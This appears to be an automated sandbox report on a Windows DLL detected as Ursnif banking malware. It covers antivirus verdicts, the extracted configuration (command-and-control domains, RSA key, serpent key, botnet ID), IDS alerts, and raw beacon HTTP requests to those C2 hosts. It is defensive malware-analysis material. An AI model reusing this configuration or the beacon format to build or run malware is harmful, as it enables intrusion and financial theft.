Windows Analysis Report 2770174.dll

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: 2770174.dll

Avira: detected

Found malware configuration

Source: 0.2.loaddll32.exe.10000000.2.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Machine Learning detection for sample

Source: 2770174.dll

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.loaddll32.exe.10000000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files

Source: 2770174.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49837 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49724 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49803 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49803 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49805 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49805 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49814 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49815 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49815 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49817 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49819 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49821 -> 45.90.58.179:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 40.97.148.226 40.97.148.226
Source: Joe Sandbox View	IP Address: 52.97.170.34 52.97.170.34

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GREENFLOID-ASUA GREENFLOID-ASUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /jdraw/yH91aKnpTrUgeTTXk_2FC/UNtUKwQdb1VcS_2B/GaoM_2Fyx_2BE1f/CKkjJtxjumUCxy08c3/hEyqk7y0R/Lv9aFeVgtQQx8QD9pW5d/Ac07adghbVZgEftTXAe/6L6pB6BmU2Y7k8ESiCzmDb/Z4dkw_2BAKquP/hA_2BwCK/3iTjiCeJZZSpLKXArjcyss9/OwKlQvPM9fHtt6/WpI0i7.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWDCCX/qrcTQot2XuPIeam7w/8XDXQ5cif7RJ/1_2B3PVmQx5/nHKK8uT65nNyIl/JeFpPVHIxWMVXvseH_2FD/YH70V7tTLImM6Joz/2I1VGAIxwkkbz7Z/4EmL4AYi/6QglyA.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0o/YfBYTeGYFQwkbZMyJ8naD46/LAJf_2B0RU/3xv7VkvLo_2BH32z2/0GV2mzuC7wB9/KQWi8z52zYq/laCh5k_2F_2FsN/gFzjneWKury1hVqDQnliR/azK5qDi4jLH99wYz/G9Hdx13SInuD3gF/73zT6HN_2B6msVs0lU/EuYlN_2BC7WR/i.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=t8ig2lm7e99tl9ioed8m825st0; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4WbJ/plMEUslrrtyCH_2Bwhq/1CDE4hgwgyY_2Bfw3s_2F1/UxPXHIDsYEwNA/DWJu4vAO/gkXIRDv7pcl_2FYyiYW0p52/VZjd1pdZUq/nUDfT2o7A87Q2yEgN/bEZSgdLSHpEB/Y8DoqjUm9asX_2BdG/q.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF_2Fb/KhTAv5JxUk1yx17bklmA1/d0ce84VGmC4XToZ3/TiJp7oqlVeIG5y4/hFv5_2BNvMTr_2BeEi/G1O6zP7eh/h0jyonPucpxshjr38gHc/mUt_2Bbr2dZAiwNrJ6q/V3apeuqs4sJwa7IUzmg12g/qV5g.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgTZ0UAG/nQc7Y04rHd/Wf9d711z2fDYWnZSZ/I5gtE5194Pn8/54FQXS9Bp0p/Yr0NIxUfu5Fay8/_2FlA1aXKnd2v_2B9oARj/_2Fx_2FChvh5vpN4/OMwk_2BosEsV5ld/sSRuMcQjMYnxoDOxLX/9QI7NxpfE/WeR0iN16/80Qd2J2g/G.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXVD/nyA2CFklxFPwVQh/Yho06_2FbaOGMgTxMt/wv24AfIjN/0MFgIcSL6gEiPqujKV_2/FBuSaCXg7gU09XOKs6c/4flUb9QPzKFwKqbjV_2FMz/mqc6yG0M3rYrC/7N85LJjr/tu_2BqIUaqz1VBst_2F35QW/3.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk4_2BjgWwj5Y0S8K/QFWsxQXH1nBjETKY/5OHlicPcimNIcL6/z4pHXf1uPEPssBLv8K/mnGWtLd2A/uaW_2Bl6KqHoNDaU_2Bh/DiOvILfU9m_2BExEsIT/5_2B5_2BSmOr5E2GYDUf9Y/mDnzrYQJR/mky.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_2BS6o/EetdeEq5gQ_2FyXySX/Ubse8b9so/m_2FVXqZKmYn0vbRxn_2/BpcuM8syJiHvDzsFPwE/VcmFcijyALhTLZxPULLl94/yvHhbYt_2F3zs/MiwgrxH9/_2F06LcLdvAsYVoK_2FJUaB/om5CWM0I.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN1p_2B/FV7Pm6a31d2J5lSN_2/BzGSBLJoW/mkH_2B1SqUGsLgri21vM/sTm8rqFhIKFyjhSMnfS/eOIuSlx61lzuK1AdQtpcLd/ecP_2F2TO_2Bj/KaylSIXS/u6E6oRIpMJVadVClzcxwIS_/2BHj1Xmv/hc.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
Source: global traffic	HTTP traffic detected: GET /jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDUp6Oi5jXD7I8Ab8U/gK4SwCYPiUPEkaUo/PrkNmh92vqxkb0v/PCnqPml9BaZFVRBIe_/2B22S8HAh/d9Tx35KtPfkXAbAsIuzf/2WiITh1H39IL9oWAn14/Ato1qcOoaQdDf8WbLtN5nh/4DNa.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0

Found strings which match to known social media urls

Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: gtm[1].js.20.dr	String found in binary or memory: "arg1":"https:\/\/www.facebook.com\/mail.com" equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b02aec4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: potec.core.min[2].js.20.dr	String found in binary or memory: eh=function(){var a=z.O(U('\x3cdiv class\x3d"mod-konami"\x3e\x3cdiv class\x3d"vd"\x3e\x3ciframe width\x3d"640" height\x3d"360" src\x3d"https://www.youtube.com/embed/SrLZgP-OR6s" frameborder\x3d"0" allowfullscreen\x3e\x3c/iframe\x3e\x3cdiv class\x3d"close"\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e').toString());z.O("body").append(a);var b=z.O(".mod-konami");b.width();b.find(".close").b("click",function(){function a(){b.removeNode()}z.T(b,"show");window.Modernizr.csstransitions||a();b.b("transitionend", equals www.youtube.com (Youtube)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel 